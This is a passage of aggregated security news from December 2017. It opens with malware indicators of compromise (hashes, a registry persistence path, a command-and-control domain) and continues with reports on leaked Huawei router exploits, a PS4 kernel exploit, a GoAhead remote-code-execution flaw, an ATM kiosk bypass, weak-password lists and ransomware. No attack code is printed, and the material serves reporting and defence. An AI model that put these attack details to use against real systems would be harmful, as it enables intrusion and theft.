By closely investigating Stage 3, the analyst would probably notice the heavy presence of “decorators”, a different format in the definition style and last but not least the core composition. Everything looks like belonging to different single developers. The variable language, the comments structure and the general usage of terms, takes the analyst to believe in having found two different developers belonging to different cultures (maybe countries). Finally the malware looks for users, computes, and web services informations and drops everything up to C2 by posting parameters to : ssrdevelopments.co.za/cgi-bin/
IoC:
Following the principal IoC for the described threat.
Hash Stage 1:
7f1860673de9b1c2e6f7d6963a499e8ba4e412a1
bf4a26c9e52a8cacc7afd7d95d197bff1e47fb00
Hash Stage 2:
ac55ee783f3ed0bd23eccd01040a128dc6dc7851
Hash Stage 3:
6a38e4acd9ade0d85697d10683ec84fa0daed11c
Persistence: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\kij %APPDATA%\Roaming\kij\kij.exe
Dropping URL:
ssrdevelopments.co.za
Command and Control:
ssrdevelopments.co.za/cgi-bin/
Related hashes from harvesting Dropping URL:
62c9d2ae7bafa9c594230c570b66ec2d4fa674a6
b15b69170994918621ceb33cb339149bdff5b065
55abcfb85e664fbc8ad1cb8b60a08409c2d26caa
f843427e9b7890f056eaa9909a5103bba6ffb8fd
f2b81e66fcb1032238415b83b75b3fe8bf28247d
cab90f7c935d355172b0db123d20b6a7d1403f65
c1ba30d7adec6d545d5274f95943f787ad4c03e7
ed9959bb0087f2c985b603cee0e760f3e0faaab15
c93851627ffd996443f85d916f3dbedd70e0ff69
144b34b4816062c2308a755273159e0460ffd604
98293b80ccf312a8da99c2b5ca36656adebd0d0f
2875d1b54337b1c17c8f4cd5f6b2d579667ee3d9
0b4299ffb3f9aa59e19dd726e79d95365fe1d461
46bb0b10d790a3f21867308e7dcdeb06784a1570
0960726560a94fbbb327aa84244f9588a3c68be8
a480a75c3af576e5656abadb47d11515a18a82be
2ba809c53eda2a475b1353c34f87ce62b6496e16
5b0c3071aa63e18aa91af59083223d3cceb0fa3c
dc780bf338053e9c1b0fdf259c831eb8a2768169
As final thought I’d like to highlight the following key concept of that analysis:

From a single email, the analyst could discover attacker’s assets, mapping them and disarming them (through IoC).
The analyzed code shows apparent evidences to belonging to different groups of attackers.
The analyzed samples show code reuse. Code reuse is dangerous because it makes attackers more powerful and extremely quick to change Malware behavior.
Hope you enjoyed.

The original post published by Marco Ramilli on his blog at the following URL:

https://marcoramilli.blogspot.it/2017/12/info-stealing-new-operation-in-wild.html


Huawei router exploit (CVE-2017-17215) involved in Satori and Brickerbot was leaked online
30.12.2017 securityaffairs
Exploit

The exploit code used to trigger the CVE-2017-17215 vulnerability in Huawei routers over the past several weeks is now publicly available.
Before Christmas, the Mirai botnet made the headlines once again, a new variant dubbed Satori was responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

The activity of the Satori botnet has been observed over the past month by researchers from Check Point security.

Satori is an updated variant of the notorious Mirai botnet that was first spotted by the malware researchers MalwareMustDie in August 2016. The malicious code was developed to target IoT devices, the Satori version targets port 37215 on Huawei HG532 devices.

The attacks against Huawei HG532 devices were observed in several countries, including the USA, Italy, Germany, and Egypt.

CVE-2017-17215%20exploit%20satori

Experts observed that attacks attempt to exploit the CVE-2017-17215 zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

News of the day is that the code used to target the Huawei routers over the past several weeks is now publicly available.

The discovery was made by Ankit Anubhav, a researcher at security firm NewSky.

Anubhav first discovered the code on Pastebin.com early this week.

“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” states a blog post published by Anubhav.

The exploit code for the CVE- 2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiku).

The availability of the code online represents a serious risk, it could become a commodity in the criminal underground, vxers could use it to build their botnet.

Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code, earlier in December, the author of the Brickerbot botnet that goes online with the moniker “Janitor” released a dump which contained snippets of Brickerbot source code.

NewSky Security analyzing the code discovered the usage of the exploit code CVE-2017–17215, this means that the code was available in the underground for a long.

“Let us compare this with a binary of Satori botnet (in the image below). Not only we see the same attack vector i.e. code injection in <NewStatusURL>, but also, we witness the other indicator “echo HUAWEIUPNP“ string, implying that both Satori and Brickerbot had copied the exploit source code from the same source.” continues NewSky.

CVE-2017-17215

This is not the first time that IoT botnets leverage issues related to the SOAP protocol. Earlier this year, security experts observed several Mirai-based botnets using two other SOAP bugs (CVE-2014–8361 and TR-64) which are code injections in <NewInternalClient> and <NewNTPServer> respectively.

Back to the present, Huawei provided a list of mitigation actions for this last wave of attacks that includes configuring a router’s built-in firewall, changing the default password or using a firewall at the carrier side.

I avoided to provide the link to the code published on Pastebin, but it is very easy to find it with the proper query.


China Has Shut Down 13,000 Websites Since 2015: Xinhua
30.12.2017 securityweek BigBrothers
China has shut down or revoked the licenses of 13,000 websites since 2015 for violating the country's internet rules, state media reported Sunday.

The news comes as the Communist country continues to strengthen its already tight regulation of the internet, a move which critics say has picked up pace since President Xi Jinping came to power in 2012.

Platforms have also closed nearly 10 million internet accounts for "violating service protocol", the official news agency said Sunday, likely referring to social media accounts.

"These moves have a powerful deterrent effect," Xinhua quoted Wang Shengjun, vice chairman of the Standing Committee of the National People's Congress (NPC), as saying.

Despite being home to the world's largest number of internet users, a 2015 report by US think tank Freedom House found that the country had the most restrictive online use policies of 65 nations it studied, ranking below Iran and Syria.

This year alone, it has enacted new rules requiring foreign tech companies to store user data inside the country, imposed fresh content restrictions, and made it increasingly difficult to use software tools that allow users to circumvent censors.

Google, Facebook, Twitter and The New York Times are all blocked in China, among countless other foreign websites.

Beijing strictly defends what it calls "cyber sovereignty" and maintains that its various forms of web censorship -- collectively known as "The Great Firewall" -- are necessary for protecting its national security.

Within China, websites must register with authorities and are responsible for "ensuring the legality of any information" posted on their platforms, according to regulations in force since 2000.

When their content runs afoul of authorities, they can be shutdown or fined.

One way to bypass the strictly controlled domestic internet is by using a virtual private network (VPN) which can allow users to access the unfiltered global internet. But here too authorities have cracked down.

Earlier this week, Wu Xiangyang from the southern Guangxi Zhuang autonomous region was sentenced to five and a half years in prison for selling a VPN service on Alibaba's Taobao and other marketplaces.


Two Romanians Charged With Hacking US Capital Police Cameras
30.12.2017 securityweek Crime
Two Romanian nationals have been arrested and charged with hacking into computer systems which controlled surveillance cameras for the Metropolitan Police Department in the US capital earlier this year, officials said Thursday.

A criminal complaint unsealed in Washington said the two -- Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28 -- were arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.

The Justice Department said the pair managed to disable 123 of the police department's 187 outdoor surveillance cameras in early January by infecting computer systems with ransomware -- an effort "to extort money" in exchange for unlocking the computer, according to an affidavit filed in court.

The case "was of the highest priority" because it impacted efforts to plan security ahead of the 2017 presidential inauguration, according to officials.

The Secret Service and other agencies "quickly ensured that the surveillance camera system was secure and operational" and the investigation found no security threats as a result of the scheme.

Isvanca remains in custody in Romania and Cismaru is on house arrest there pending further legal proceedings, the Justice Department said.


2018 Cyber Security Predictions

28.12.2017 Symantec Cyber
As 2017 draws to a close, here is what you can expect over the course of the upcoming year
This past year, cyber criminals caused major service disruptions around the world, using their increasing technical proficiency to break through cyber defenses. In 2018, we expect the trend to become more pronounced as these attackers will use machine learning and artificial intelligence to launch even more potent attacks.

Gear up for a busy year ahead. Incidents like the WannaCry attack, which impacted more than 200,000 computers worldwide in May, are just the warmup to a new year of more virulent malware and DDoS attacks. Meanwhile, cyber criminals are poised to step up their attacks on the millions of devices now connected to the Internet of Things both in offices and homes.

As 2017 draws to a close, here is what you can expect over the course of the upcoming year:

Blockchain Will Find Uses Outside Of Cryptocurrencies, But Cyber criminals Will Focus On Coins and Exchanges

Blockchain is finally finding applications outside of crypto-currencies, expanding to inter-bank settlements, fuelled by increasing traction in IoT. However, these use cases are still in their infancy and are not the focus for most cyber criminals today. Instead of attacking Blockchain technology itself, cyber criminals will focus on compromising coin-exchanges and users’ coin-wallets since these are the easiest targets, and provide high returns. Victims will also be tricked into installing coin-miners on their computers and mobile devices, handing their CPU and electricity over to cyber criminals.

Cyber Criminals Will Use Artificial Intelligence (AI) & Machine Learning (ML) To Conduct Attacks

No cyber security conversation today is complete without a discussion about AI and ML. So far, these conversations have been focused on using these technologies as protection and detection mechanisms. However, this will change in the next year with AI and ML being used by cyber criminals to conduct attacks. It is the first year where we will see AI versus AI in a cybersecurity context. Cyber criminals will use AI to attack and explore victims’ networks, which is typically the most labour-intensive part of compromise after an incursion.

Supply Chain Attacks Will Become Mainstream

Supply chain attacks have been a mainstay of classical espionage and signals-intelligence operators, compromising upstream contractors, systems, companies and suppliers. They are highly effective, with nation-state actors using human intelligence to compromise the weakest links in the chain, as well as malware implants at the manufacture or distribution stage through compromise or coercion.

These attacks are now moving into the mainstream of cyber crime. With publicly available information on technology, suppliers, contractors, partnerships and key personnel, cyber criminals can find and attack weak links in the supply chain. With a number of high-profile, successful attacks in 2016 and 2017, cyber criminals will focus on this method in 2018.

This past year, cyber criminals caused major service disruptions around the world, using their increasing technical proficiency to break through cyber defenses. In 2018, we expect the trend to become more pronounced as these attackers will use machine learning and artificial intelligence to launch even more potent attacks.

File-less and File-light Malware Will Explode

2016 and 2017 have seen consistent growth in the amount of file-less and file-light malware, with attackers exploiting organizations that lack in preparation against such threats. With fewer Indicators of Compromise (IoC), use of the victims’ own tools, and complex disjointed behaviours, these threats have been harder to stop, track and defend against in many scenarios. Like the early days of ransomware, where early success by a few cyber criminals triggered a gold-rush like mentality, more cyber criminals are now rushing to use these same techniques. Although file-less and file-light malware will still be smaller by orders-of-magnitude compared to traditional-style malware, they will pose a significant threat and lead to an explosion in 2018.

Organisations Will Still Struggle With Security-as-a-Service (SaaS) Security

Adoption of SaaS continues to grow at an exponential rate as organizations embark on digital transformation projects to drive business agility. This rate of change and adoption present many security challenges as access control, data control, user behaviour and data encryption vary significantly between SaaS apps. While this is not new and many of the security problems are well understood, organizations will continue to struggle with all these in 2018.

Combined with new privacy and data protections laws going into effect globally, these will pose major implications in terms of penalties, and more importantly, reputational damage.

Organisations Will Still Struggle With Infrastructure-as-a-Service (IaaS) Security – More Breaches Due to Error, Compromise & Design

IaaS has completely changed the way organisations run their operations, offering massive benefits in agility, scalability, innovation and security. It also introduces significant risks, with simple errors that can expose massive amount of data and take down entire systems. While security controls above the IaaS layer are a customer’s responsibility, traditional controls do not map well to these new cloud-based environments – leading to confusion, errors and design issues with ineffective or inappropriate controls being applied, while new controls are ignored. This will lead to more breaches throughout 2018 as organizations struggle to shift their security programs to be IaaS effective.

Financial Trojans Will Still Account For More Losses Than Ransomware

Financial Trojans were some of the first pieces of malware to be monetised by cyber criminals. From simple beginnings as credential-harvesting tools, they have since evolved to advanced attack frameworks that target multiple banks, and banking systems, sending shadow transactions and hide their tracks. They have proven to be highly profitable for cyber criminals. The move to mobile, application-based banking has curtailed some of the effectiveness, but cyber criminals are quickly moving their attacks to these platforms. Cyber criminals’ profits from Financial Trojans is expected to grow, giving them higher gains as compared to Ransomware attacks.

Expensive Home Devices Will Be Held To Ransom

Ransomware has become a major problem and is one of the scourges of the modern Internet, allowing cyber criminals to reap huge profits by locking up users’ files and systems. The gold-rush mentality has not only pushed more and more cyber criminals to distribute ransomware, but also contributed to the rise of Ransomware-As-A-Service and other specializations in the cyber criminal underworld. These specialists are now looking to expand their attack reach by exploiting the massive increase in expensive connected home devices. Users are generally not aware of the threats to Smart TVs, smart toys and other smart appliances, making them an attractive target for cyber criminals.

IoT Devices Will Be Hijacked and Used in DDoS Attacks

In 2017, we have seen massive DDoS attacks using hundreds of thousands of compromised IoT devices in people’s homes and workplaces to generate traffic. This is not expected to change with cyber criminals looking to exploit the poor security settings and lax personal management of home IoT devices. Furthermore, the inputs and sensors of these devices will also be hijacked, with attackers feeding audio, video or other faked inputs to make these devices do what they want rather than what users expect them to do.

IoT Devices Will Provide Persistent Access to Home Networks

Beyond DDoS attacks and ransomware, home IoT devices will be compromised by cyber criminals to provide persistent access to a victim’s network. Home users generally do not consider the cyber security implications of their home IoT devices, leaving default settings and not vigilantly updating them like they do with their computers. Persistent access means that no matter how many times a victim cleans their machine or protects their computer, the attacker will always have a backdoor into victims’ network and the systems that they connect to.

Attackers Exploit The Move To DevOps

The agile, DevOps and DevSecOps movements are transforming IT and cyber-security operations in every organisation. With improved speed, greater efficiencies and more responsive delivery of IT services, this is quickly becoming the new normal. While all this works to the greater good, like any disruptive change, it offers opportunities not only for errors, but also for attackers to exploit. Much like the issues facing the move to SaaS and IaaS, organizations are struggling to apply security controls in these new models of CI/CD and automation. As environments change constantly, anomaly detection gets harder, with many existing systems creating far too many false positives to be effectively dealt with. In the next year, we’ll see a greater number of attackers taking advantage of this to cover their activities inside a victim’s environment.

Cryptowars Redux Enters Its Second Phase

The cryptowars were fought and won in the 1990s, or so everyone thought. Over the last two years, however, the struggle has re-emerged with governments, policy makers, law enforcement, technology companies, telcos, advertisers, content providers, privacy bodies, human rights organisations and pretty much everyone expressing different opinions on how encryption should be used, broken, circumvented or applied. The war will continue to be fought on a mostly privacy versus government surveillance basis, particularly for device and communications (email and messaging) encryption. Beyond that, though, expect to see content providers, telcos and advertisers influencing much of the adoption of transport layer encryption, as it’s often viewed as being at odds with their business models.


Kernel Exploit for Sony PS4 Firmware 4.05 Released, Jailbreak Coming Soon
27.12.2017 thehackernews
Exploit

Wishing you all a very 'belated' Merry Christmas. This holiday season Santa has a very special gift for all PlayStation gamers.
Developer SpecterDev finally released a fully-functional much-awaited kernel exploit for PlayStation 4 (firmware 4.05) today—almost two months after Team Fail0verflow revealed the technical details of it.
Now available on Github, dubbed "namedobj," the kernel exploit for the PlayStation 4 on 4.05FW allows users to run arbitrary code on the gaming console, enabling jailbreaking and kernel-level modifications to the system.
Although PS4 kernel exploit does not include Jailbreak code, others can develop a full jailbreak exploit using it.
Jailbreaking allows users to run custom code on the console and install mods, cheats, third-party applications, and games that are typically not possible because of the anti-piracy mechanisms implicated on the Sony PlayStation.
"This release, however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew," SpecterDev said.
"This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival."
It should be noted that for some users it may not work as smooth as it sounds.
"This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads," SpecterDev warned.
PS4 gamers who are running firmware version lower than 4.05 can simply update their console to take advantage of this exploit.
Of course, Sony would not be happy with the launch of PlayStation 4 kernel exploit and would be trying hard to eliminate any vulnerability for the most recent version of PS4 firmware.


For the second year in a row, “123456” was the top password found in data dumps in 2017
27.12.2017 securityaffairs  Hacking

For the second year in a row, “123456” was the top password found in data dumps in 2017 despite the numerous warning of using strong passwords.
For the second year in a row, “123456” was the top password among the millions of cleartext passwords exposed online due to the numerous data breaches suffered by organizations and private firms.

The list was published by researchers at SplashData who analyzed more than five million user records containing passwords that were leaked online in 2017.

“Use of any of the passwords on this list would put users at grave risk for identity theft,” said a SplashData spokesperson in a press release.

The list of Top 100 Worst Passwords of 2017 is embarrassing, it includes a huge number of sports terms (football, baseball, soccer, hockey, Lakers, jordan23, golfer, Rangers, Yankees) and car brands (Corvette, Ferrari, Harley, Mercedes).

Users continue to use common names as their passwords, names like of Robert (#31), Matthew (#32), Jordan (#33), Daniel (#35) and many others continue to be widely used.

top%20password

Top passwords are the basic components of lists used by hackers in brute force attacks based on dictionaries. Attackers will use the Top password list also to create common variations on these words using simple algorithms, for example by adding a digit or any other character combinations at the start or end of words.

Despite the numerous report published by the experts, users continue to adopt weak passwords and tend to reuse them to access several web services.

Let me close the post with the list of the Top 10 passwords extracted from the SplashData report.

1 – 123456 (rank unchanged since 2016 list)
2 – password (unchanged)
3 – 12345678 (up 1)
4 – qwerty (Up 2)
5 – 12345 (Down 2)
6 – 123456789 (New)
7 – letmein (New)
8 – 1234567 (Unchanged)
9 – football (Down 4)
10 – iloveyou (New)


The popular cryptocurrency exchange EtherDelta suffered a DNS attack
27.12.2017 securityaffairs  Hacking

The popular cryptocurrency exchange EtherDelta was hacked, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789) as well as a large number of tokens.
The spike in cryptocurrency values is attracting cybercriminals, the last victim is the popular cryptocurrency exchange EtherDelta that announced a potential attack against its DNS server.
As result of the attack, the exchange suspended its service, below the tweet sent by the company that confirms that its server was hacked by attackers.


EtherDelta
@etherdelta
Dear users, we have reason to believe that there had been malicious attacks that temporarily gained access to @etherdelta http://EtherDelta.com DNS server. We are investigating this issue right now - in the meantime please DONOT use the current site.

9:34 PM - Dec 20, 2017
81 81 Replies 536 536 Retweets 359 359 likes
Twitter Ads info and privacy
The attackers spoofed EtherDelta’s domain to trick users into sending money.

“At least 308 ETH ($266,789) were stolen, as well as a large number of tokens potentially worth hundreds of thousands of dollars.” reported Mashable.

EtherDelta posted another tweet to warn its users and explain that the impostor’s app had no chat button on the navigation bar, nor did it have an official Twitter feed on the bottom right. EtherDelta advised all users not to use the site.


EtherDelta
@etherdelta
⚠️ 2/2 *BE AWARE* The imposer's app has no CHAT button on the navigation bar nor the offical Twitter Feed on the bottom right. It is also populated with a fake order book.

9:48 PM - Dec 20, 2017
296 296 Replies 517 517 Retweets 410 410 likes
Twitter Ads info and privacy
On Dec. 22, the service was fully restored. The company clarified that users using the MetaMask or hardware wallet on EtherDelta were not affected by the attack, also users that had never imported their private key on the imposer’s phishing site are safe.

EtherDelta

Recently another cryptocurrency exchange, the South Korean Youbit has gone bankrupt after suffering a major cyber attack for the second time this year.

Earlies December, the cryptocurrency mining market NiceHash confirmed it has fallen victim to a hacking attack that resulted in the loss of $60m worth of Bitcoin.

The EtherDelta hack is emblematic, even if EtherDelta is supposed to be decentralized the attack against its website caused serious problems to the company operations.

 


Mozilla patches five issues in Thunderbird, including a critical flaw
27.12.2017 securityaffairs
Vulnerebility

Mozilla issued a critical security update to address five flaws in the popular open-source Thunderbird email client.
The latest release, Thunderbird 52.5.2 version, fixes the vulnerabilities, including two issues rated as high, one rated moderate and another low.

The most severe flaw fixed with the Thunderbird 52.5.2 version is a critical buffer overflow vulnerability (tracked as CVE-2017-7845) that affects Thunderbird running on the Windows operating system.

“A buffer overflow occurs when drawing and validating elements using Direct 3D 9 with the ANGLE graphics library, used for WebGL content. This is due to an incorrect value being passed within the library during checks and results in a potentially exploitable crash.” reads the security advisory published by the Mozilla Foundation.

The two security vulnerabilities rated as high were CVE-2017-7846 and CVE-2017-7847. The first one (CVE-2017-7846) affects the Thunderbird’s RSS reader.

“It is possible to execute JavaScript in the parsed RSS feed when RSS feed is viewed as a website, e.g. via “View -> Feed article -> Website” or in the standard format of “View -> Feed article -> default format” reads the advisory.

The second high-severity issue tracked as CVE-2017-7847 also affect the RSS reader.

“Crafted CSS in an RSS feed can leak and reveal local path strings, which may contain user name.” states the advisory.

Thunderbird

The moderate issue tracked as CVE-2017-7848 also affects the RSS feed, while low issue tracked as CVE-2017-7829 impacts email.

“It is possible to spoof the sender’s email address and display an arbitrary sender address to the email recipient. The real sender’s address is not displayed if preceded by a null character in the display string.” reads Mozilla’s advisory.


The spike in Bitcoin price is making it a less useful payment method in the cybercrime underground
27.12.2017 securityaffairs CyberCrime

The recent spike in the Bitcoin price and the fees associated with each transaction are making Bitcoin a less useful payment method in the cybercrime underground.
We have a long debated the use of unregulated virtual currencies like Bitcoin in the criminal underground. Virtual currencies have a crucial role in facilitating illicit commerce, it is normal that their fluctuation could have a significant impact on the criminal ecosystem. The recent spike in the price of Bitcoin and the fees associated with each transaction are making Bitcoin a less useful payment method in the cybercrime underground.

Originally, one of the points of strength for Bitcoin was that payments would be fast, cheap, and convenient. This was true until the beginning of this year when Bitcoin fees were often less than $0.10.

Bitcoin price spike

The spike in the Bitcoin value and related fees per transaction has made Bitcoin far less attractive for conducting small-dollar transactions that represent the vast majority of payments in the criminal underground.

“As a result, several major underground markets that traffic in stolen digital goods are now urging customers to deposit funds in alternative virtual currencies, such as Litecoin. Those who continue to pay for these commodities in Bitcoin not only face far higher fees, but also are held to higher minimum deposit amounts.” wrote the popular investigator and security blogger Brian Krebs.

Krebs cited as an example the case of the black marketplace “Carder’s Paradise” that he recently analyzed, well its administrators admitted difficulties due to the spike in the value of Bitcoin.

Krebs explained that the current minimum deposit amount on Carder’s Paradise is 0.0066 BTCs (roughly USD $100). The deposit fee for each transaction is $15.14, this means that every time a user of the black market deposits the minimum amount into this shop is losing approximately 15 percent his deposit in transaction fees.

“The problem is that we send all your deposited funds to our suppliers which attracts an additional Bitcoin transaction fee (the same fee you pay when you make a deposit),” Carder’s Paradise explains. “Sometimes we have to pay as much as 5$ from every 1$ you deposited.”

“We have to take additionally a ‘Deposit fee’ from all users who deposit in Bitcoins. This is the amount we spent on transferring your funds to our suppliers. To compensate your costs, we are going to reduce our prices, including credit cards for all users and offer you the better bitcoin exchange rate.”

“The amount of the Deposit Fee depends on the load on the Bitcoin network. However, it stays the same regardless of the amount deposited. Deposits of 10$ and 1000$ attract the same deposit fee.”

“If the Bitcoin price continues increasing, this business is not going to be profitable for us anymore because all our revenue is going to be spent on the Bitcoin fees. We are no longer in possession of additional funds to improve the store.”

“We urge you to start using Litecoin as much as possible. Litecoin is a very fast and cheap way of depositing funds into the store. We are not going to charge any additional fees if you deposit Litecoins.”

In the case of the Carder’s Paradise, the huge volume of transactions allowed the administrators to lower the price of stolen credit cards to compensate the increase of the transaction fees, but it is an exceptional scenario.

“Our team made a decision to adjust the previous announcement and provide a fair solution for everyone by reducing the credit cards [sic] prices,” the message concludes.

Transaction fees are too high and operators of black marketplaces could be forced to refuse payments in Bitcoin.


Three fake Bitcoin wallet apps were removed from the official Google Play
27.12.2017 securityaffairs Android

Researchers from the mobile security firm Lookout have discovered three fake Bitcoin wallet apps in the official Play store, Google promptly removed them.
Experts from mobile security firm Lookout have discovered three fake Bitcoin wallet apps in the official Play store. The fake Bitcoin wallet apps were removed by Google Play after security researchers reported their discovery to the tech giant.

The spike in Bitcoin prices is attracting crooks as never before, the number of attacks involving the cryptocurrency continues to increase.

The three fake applications tracked as PickBitPocket were developed to provide the attacker’s Bitcoin address instead of the seller’s one. The fake apps accounted for a total of up to 20,000 downloads before Google removed them from the Play store.

“Lookout has identified three Android apps disguised as bitcoin wallet apps, previously in the Google Play Store, that trick victims into sending bitcoin payments to attacker-specified bitcoin addresses.” reads the analysis published by Lookout.

“Google removed the apps immediately after Lookout notified the company. The apps collectively had up to 20,000 downloads at time of removal.”

The researchers explained that when users that installed the fake apps attempt to buy goods or services their payments are hijacked to the attacker’s wallet.

The three fake Bitcoin wallet apps discovered by Lookout are:

Bitcoin mining, which had between 1,000 and 5,000 installs at the time it was removed;
Blockchain Bitcoin Wallet – Fingerprint, which had between 5,000 and 10,000 installs;
Fast Bitcoin Wallet, which has between 1,000 and 5,000 installs.
fake%20bitcoin%20wallet%20apps

“As Bitcoin captures broader interest, this means more people may be purchasing the cryptocurrency, or looking for mobile wallets to store their coins. Individuals should be vigilant in choosing a secure wallet and should also have a security solution in place to identify malicious activity on their device,” concluded Lookout.


ATMs operated by a Russian Bank could be hacked by pressing five times the ‘Shift’ key
27.12.2017 securityaffairs Hacking

ATMs operated by the Sberbank bank running Windows XP are affected by easily exploitable security vulnerabilities, they could be hacked by pressing five times the ‘Shift’ key.
We have warned several times of risks for ATM running outdated Windows XP operating system. These systems could be easily hacked as recently discovered by an employee of the Russian blogging platform Habrahabr who reported that the ATMs operated by the Sberbank bank running Windows XP are affected by easily exploitable security vulnerabilities.

The user discovered that a full-screen lock that prevents access to various components of an ATM operating system could be bypassed by pressing five times special keys like SHIFT, CTRL, ALT, and WINDOWS.

By pressing the SHIFT key five times it is possible to access the Windows settings and displaying the taskbar and Start menu of the operating system, with this trick users can have access to Windows XP by using the touchscreen.

“Well, I, standing at the terminal of the Savings Bank with a full-sized keyboard and waiting for the operator to answer the phone, decided to press this Shift from boredom, naively believing that without functional keys this would lead to nothing. No matter how it is! Five times quick pressing of this key gave me that very little window, besides revealing the task panel with all the bank software.” wrote the user.

“Stopping the work of the batch file (see the taskbar on the video below), and then all the banking software, you can break the terminal.”

This vulnerability allows hackers to modify ATM boot scripts and install malicious code on the machine.

The users tried to report the issue to the Sberbank contact center, but unfortunately, the operator was not able to help the man and suggested him to contact the support service using the phone number written on the terminal itself.

According to the German website WinFuture, Sberbank had been informed of the security flaw in its ATM almost two weeks ago. The bank confirmed to have immediately fixed the security issue, but the user who discovered the flaw claimed that the issue is still present on the terminal he visited.

“In tech support, a friendly girl after I said that I want to report a vulnerability, immediately switched me to some other specialist. He first asked how to contact me and the terminal number, then on the nature of the problem, then I listened to music for a long time, and, after all, the guy said that the problem is fixed. ” continues the user.

“All this happened on the sixth of December. Two weeks later I decided to check that there is a terminal. Still, after all, they said that they “fixed” the problem, probably they should have already eliminated it, but no – it’s still there, the window still pops up.”

Security experts urge financial institutions to update the latest version of Windows for their ATMs.


Experts discovered a flaw in GoAhead that affects hundreds of thousands IoT devices
26.12.2017 securityaffairs IoT

Experts from Elttam discovered a flaw in GoAhead tiny web server that affects hundreds of thousands IoT devices, it could be exploited to remotely execute malicious code on affected devices.
A vulnerability in the GoAhead tiny web server package, tracked as CVE-2017-17562, affects hundreds of thousands of IoT devices. The GoAhead solution is widely adopted by tech giants, including Comcast, IBM, Boeing, Oracle, D-Link, ZTE, HP, Siemens, and Canon. It is easy to find the tiny web server in almost any IoT device, including printers and routers.

The vulnerability was discovered by experts from the security firm Elttam who devised a method to remotely execute malicious code on devices running the GoAhead web server package. The flaw affects all GoAhead versions before GoAhead 3.6.5.

“This blog post details CVE-2017-17562, a vulnerability which can be exploited to gain reliable remote code execution in all versions of the GoAhead web server < 3.6.5.” reads the analysis published by Elttam.

“The vulnerability is a result of Initialising the environment of forked CGI scripts using untrusted HTTP request parameters, and will affect all user’s who have CGI support enabled with dynamically linked executables (CGI scripts). This behavior, when combined with the glibc dynamic linker, can be abused for remote code execution using special variables such as LD_PRELOAD (commonly used to perform function hooking, see preeny).”

Attackers can exploit the vulnerability if the CGI support is enabled with dynamically linked CGI program. Unfortunately, this configuration is quite common.

Elttam reported the vulnerability to Embedthis, the company who developed the web server, that promptly released an update that addresses the flaw.

Now it is important that hardware manufacturers will include the patch in the instances of the GoAhead running into their products, but this process could take a lot of time.

To have an idea of the impact of such flaw it is possible to query the Shodan search engine, a number of devices between 500,000 and 700,000 could be affected.

GoAhead%20server


❄️🎄3ncr1ptmas🎄❄️
@3ncr1pt3d
CVE-2017-17562: Remote LD_PRELOAD exploitation of GoAhead web server.
So this runs a hell of a lot of things: printers, network gear, CC cameras. Users of telecoms hosting stuff. Convenience without proper configuration.

What I found on Shodan now:

6:07 AM - Dec 19, 2017
13 13 Replies 102 102 Retweets 157 157 likes
Twitter Ads info and privacy
Elttam also released a proof-of-concept code that could be used to test if IoT devices are vulnerable to the CVE-2017-17562 flaw.

Such kind of flaws are exploited by IoT malware like BrickerBot, Mirai, Hajime, and Persirai.

In March, the researcher Pierre Kim revealed that more than 185,000 vulnerable Wi-Fi-connected cameras are exposed to the Internet, due to a flaw in GoAhead server.


Schneider Electric Patches Flaws in Pelco VideoXpert Enterprise product
26.12.2017 securityaffairs
Vulnerebility

Schneider Electric recently released a firmware update for its Pelco VideoXpert Enterprise product that addresses several vulnerabilities, including a high severity code execution flaw, tracked as CVE-2017-9966.
The Pelco VideoXpert solution is widely used in commercial facilities worldwide.

The security researcher Gjoko Krstic has found two directory traversal bugs and an improper access control flaw that can be exploited by an attacker to trigger an arbitrary code execution.

Both Schneider Electric and ICS-CERT published security advisories about the CVE-2017-9966, which could be exploited by an attacker to replace certain files and execute malicious code with system privileges.

“By replacing certain files, an authorized user can obtain system privileges and the inserted code would execute at an elevated privilege level.

CVE-2017-9966 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been calculated;” reads the ICS-CERT.

“Successful exploitation of these vulnerabilities may allow an authorized user to gain system privileges or an unauthorized user to view files.”

pelco%20videoxpert

Both directory traversal vulnerabilities (tracked as CVE-2017-9964 and CVE-2017-9965) have been classified as medium severity. The first flaw could be exploited by an attacker to bypass authentication or hijack sessions by “sniffing communications.”

The second directory traversal vulnerability can be exploited by an unauthorized user to access web server files that could contain sensitive information.

These Pelco VideoXpert Enterprise vulnerabilities have been patched with the release of firmware version 2.1. All prior versions are affected.


Experts from Bleeping Computer spotted a new Cryptomix Ransomware variant
25.12.2017 securityaffairs
Ransomware

Security experts spotted a new variant of the CryptoMix ransomware that uses a different extension (.FILE) and a new set of contact emails.
Security experts from BleepingComputer discovered a new variant of the CryptoMix ransomware that uses a different extension (.FILE) to append to the file names of the encrypted files and uses new contact emails.

For example, a file encrypted by this variant of ransomware has an encrypted file name of 0D0A516824060636C21EC8BC280FEA12.FILE.

Experts discovered that this variant uses the same encryption methods of previous ones, the ransomware uses the same ransom note is still named _HELP_INSTRUCTION.TXT, but the contact emails to receive the payment instructions are file1@keemail.me, file1@protonmail.com, file1m@yandex.com, file1n@yandex.com, and file1@techie.com.

CryptoMix%C2%A0ransomware

Further details and the IoCs are included in the post published on Bleeping Computer.

“As we are always looking for weaknesses, if you are a victim of this variant and decide to pay the ransom, please send us the decryptor so we can take a look at it. You can also discuss or receive support for Cryptomix ransomware infections in our dedicated Cryptomix Help & Support Topic.” wrote Lawrence Abrams.

Below the list of recommendations provided by the experts to protect your system from ransomware attacks.

Backup, Backup, Backup!
Do not open attachments if you do not know who sent them.
Do not open attachments until you confirm that the person actually sent you them.
Enable the showing of file extensions.
